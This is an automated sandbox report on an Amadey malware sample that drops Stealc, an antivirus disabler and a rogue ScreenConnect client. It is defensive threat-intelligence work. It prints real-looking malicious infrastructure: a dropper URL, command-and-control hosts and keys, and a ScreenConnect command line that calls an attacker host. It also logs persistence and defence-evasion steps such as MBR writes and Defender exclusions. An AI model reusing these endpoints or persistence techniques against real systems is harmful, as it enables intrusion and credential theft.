amadey | 5fd7a1d8d4083ed82cff3fce09c63c0945404c8cc37997b79448700cdf218ba5

Analysis

max time kernel
108s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f5b76ee2f82d8dcc2dd274f1db28f32d.exe
Size

938KB
MD5

f5b76ee2f82d8dcc2dd274f1db28f32d
SHA1

a987208afef07acd1406d8ab4a61a0ba7e2f7777
SHA256

5fd7a1d8d4083ed82cff3fce09c63c0945404c8cc37997b79448700cdf218ba5
SHA512

0505088b4b5d24137505dff28822ea4d5d10097b7cfa3494d9079d0532c20538b83a2011d8bc62737ebdb5b5ab28692048859a7ed7e1bb6c6253158bde178474
SSDEEP

24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0yu:sTvC/MTQYxsWR7a0y

Score

10^/10

amadey healer stealc 092155 trump bootkit defense_evasion discovery dropper execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/4816-23012-0x0000000000500000-0x0000000000954000-memory.dmp	healer
behavioral2/memory/4816-23011-0x0000000000500000-0x0000000000954000-memory.dmp	healer
behavioral2/memory/4816-23440-0x0000000000500000-0x0000000000954000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 12724 created 2840	12724	Exam.com	49
PID 13044 created 2840	13044	Exam.com	49

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1ee0df37aa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0746f4bfe9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21	5296	powershell.exe
148	8964	powershell.exe
172	3604	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3404	powershell.exe
3604	powershell.exe
5296	powershell.exe
8964	powershell.exe
6892	powershell.exe
7196	powershell.exe
7552	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 14 IoCs

flow	pid	Process
28	1244	rapes.exe
122	1244	rapes.exe
148	8964	powershell.exe
187	1244	rapes.exe
187	1244	rapes.exe
187	1244	rapes.exe
187	1244	rapes.exe
38	1244	rapes.exe
172	3604	powershell.exe
30	2948	svchost.exe
55	1244	rapes.exe
126	1244	rapes.exe
141	1244	rapes.exe
21	5296	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b5e51aa1.sys	46f39871.exe
File created	C:\Windows\System32\Drivers\klupd_b5e51aa1a_arkmon.sys	46f39871.exe
File created	C:\Windows\System32\Drivers\klupd_b5e51aa1a_klbg.sys	46f39871.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
10832	takeown.exe
9052	icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klark.sys"	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_mark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_mark.sys"	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b5e51aa1a_arkmon.sys"	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=4f73ba57-7177-4e64-a228-17c76f8a32ce&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAbRPyxIcf5kOtQZEL1FHvlgAAAAACAAAAAAAQZgAAAAEAACAAAAAt7JeNmcBQ6ULX5ey0N87P%2bItuI2lVinyaZNF1MWgSdwAAAAAOgAAAAAIAACAAAAABmlC%2ft1elV9ue0W2E87NCC5j85dAWlGClDbR4Kbuc8aAEAADGDH%2bq%2f%2fCF%2bNnJBTrv%2fEMuS4rglcKzLDCjdG5XV%2bB9tPPjbkPHx8rFi1VuIplRpyqkBKRNMHfcvmbmsOc%2boCFGVoYfSX6hsVxV5V5b0zQjC%2bUTj2oYZc%2fwow2MGy6501tDsyBBAqDCCkOlg0rSxCY4Qph1H573dQ2gK9C8Q0eKLhbfUo%2bohatNPBlwIBKigCX8Z1i4YNddt2IeW7fndrJGkYk5m2e0AVZ9yCE9uBdhC93%2bFS6M6JE7G%2b31m9qFsOWu90r6DGNJLA2VySzs0%2fvLpwBgt%2bfrGTvF2K4%2bMd0%2bs3q83lkVVWNKzmLMWBfjE6v1SPxvMqlLDEKbmnYtGPw7O4ZHn13ler2s0TBJhQQyZeN8%2bwUk9TbflFH7mtcD3d0ptZttEDs%2fjVzeUZq4Lirw%2fOBeWpPlZCdw1L2u9DbwUV%2bmUX1uYnixJG92Dq7VBJ2YbUyZFo7D0e8WiLCt1pl6gwKU76mvB7sdIHcT5LnZk780jIAIeCBA01i9rka8FM4kE9EokGWjP79rEuVg%2feq3yMblJigIayp1pe44%2fZhcjhFHhRiVKVdGF%2bfX7GoYL%2fsMur1RaTDHNEJEgHU79gEZz78TLuwPuDwF%2bWNHXzBab%2fnuVH1bt7rwZECThYiK8n9akbY8XO4lnaFqosRy7wUbbminXHTPipAWHyC%2b55%2bsjUSw9doeKCwBm8Z%2bFlo%2fXBDwE2Kxc5PF9oYMgIcQF8Hxs8pxg99nifOg6k%2fI8VhqoOrjgzK9jFhn6DtexNzosAWosfAZU7ye7HD%2bHJ9EnrIZMiJuNGv%2bAlsS23zU1pxsBtuOeHerUctQcmQWUrIjo4yJd9CFuqsF7qIBjwSR4t9hUGsRze86t8pI2SC15x8r8k4RlOfVnQW1xB84IZ%2b2T19HLUPVx6UsZeif9448TorLi8Zz223rvq3KcIYeWvibuanb3DVpmliz4ISOuwqp9AiCdItfxmUSybIolAksd3SXAGqo80clvzbnqk7iaOH37uKo%2bZzIyfz%2bmCvyDiUjTg%2fn%2bdHJ15rkU8y7NHpkoFoW3TFN1sPysCKzloP7ddKF9zigLHdNYvq9KiPSmY1%2bq0K04yaYLA%2bBtKAABhLTie99thHNXc7CuxUs4mpeUlqlSGxJ9IL4Hg4I1VlZl1Gwnc2GjqX%2bPqboiivAwV5z%2fiypYwyf0%2bqcXJb995DabOycAs2oMEDz%2bNbw2t%2fiJNF2zNt9cBctrlmet94GQjv4kzUiZtVDdOFr9J%2bk4CI5R8zrgJ%2fK%2bLzRZ9ND6KH%2f%2b%2fjAWU7OxQpPtiXp6dKRhnjFKvLBzXEM4bh7%2fO0wQg%2fIvKHji2Xp%2bFdHagpzG3I0ekd8X85C9%2frt1gbAbzRoUQ3YZ%2fvaM25h6z9LilF5%2bwGz5nV%2fwNWA52y%2b6q%2b2d1LILkQIVP2mmE%2fodSmR0VhrnAq3q1qoHJrwKXCMTOXMP8tq3%2b4B%2bmdFfhHIL9LueMA7oPfYSvqANmzYlfMr4347eLx8%2fi%2fe1LzaiLUfYPVATGop7ZQGQTl68FeKxmaljVlxwEwAlm6675tvoO9%2bTqUo8b%2b5cvL5CbycXFfHPeXJiwrHCNYd0kAAAAAb8bVNsRoFhQXH5PouPfJiVd0gIc12QSX2aYJpghPSzWF9xYAiZZ2xNgTt9OzLSYszdjdehGK9Ds1E7Sljm098&t=purchased\""	ScreenConnect.ClientService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b5e51aa1\ImagePath = "System32\\Drivers\\b5e51aa1.sys"	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_arkmon.sys"	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klbg\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klbg.sys"	46f39871.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1ee0df37aa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1ee0df37aa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0746f4bfe9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0746f4bfe9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	tool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	11.exe

Deletes itself 1 IoCs

pid	Process
5388	w32tm.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 36 IoCs

pid	Process
4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
1244	rapes.exe
5196	f73ae_003.exe
864	tzutil.exe
5388	w32tm.exe
2868	7IIl2eE.exe
1396	TbV75ZR.exe
10588	1ee0df37aa.exe
12724	Exam.com
7840	rapes.exe
10180	tool.exe
6156	WLbfHbp.exe
7804	BIm18E9.exe
8288	ScreenConnect.ClientService.exe
8552	3ba6653a6c.exe
8784	ScreenConnect.WindowsClient.exe
10248	ScreenConnect.WindowsClient.exe
10776	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
10760	14652926.exe
1380	46f39871.exe
6776	BIm18E9.exe
8388	7IIl2eE.exe
4728	483d2fa8a0d53818306efeb32d3.exe
10328	TbV75ZR.exe
13044	Exam.com
11060	f73ae_003.exe
3372	WLbfHbp.exe
7056	8ceb476d68.exe
9944	apple.exe
10112	11.exe
2804	11.exe
11624	rapes.exe
13104	Passwords.com
6392	Exam.com
6688	0746f4bfe9.exe
208	Exam.com

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	1ee0df37aa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	0746f4bfe9.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys	46f39871.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys\ = "Driver"	46f39871.exe

Loads dropped DLL 48 IoCs

pid	Process
7064	MsiExec.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
6956	rundll32.exe
1748	MsiExec.exe
8204	MsiExec.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
10832	takeown.exe
9052	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ba6653a6c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341150101\\3ba6653a6c.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341160121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fe4e063c-660a-418a-a95c-a2255181f271 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{5e9e45c2-d9f3-42ef-a926-eaa2b36231c3}\\fe4e063c-660a-418a-a95c-a2255181f271.cmd\""	46f39871.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0746f4bfe9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341370101\\0746f4bfe9.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\F:	46f39871.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	46f39871.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00090000000241fa-21098.dat	autoit_exe
behavioral2/files/0x0007000000024300-22983.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\gkcseanl.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\gkcseanl.newcfg	ScreenConnect.ClientService.exe

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
10736	tasklist.exe
11428	tasklist.exe
8992	tasklist.exe
9764	tasklist.exe
6944	tasklist.exe
8832	tasklist.exe
9540	tasklist.exe
2400	tasklist.exe
5444	tasklist.exe
1708	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
1244	rapes.exe
10588	1ee0df37aa.exe
7840	rapes.exe
10776	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
4728	483d2fa8a0d53818306efeb32d3.exe
11624	rapes.exe
6688	0746f4bfe9.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 7056 set thread context of 7200	7056	8ceb476d68.exe	226

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	14652926.exe
File opened (read-only)	\??\VBoxMiniRdrDN	46f39871.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
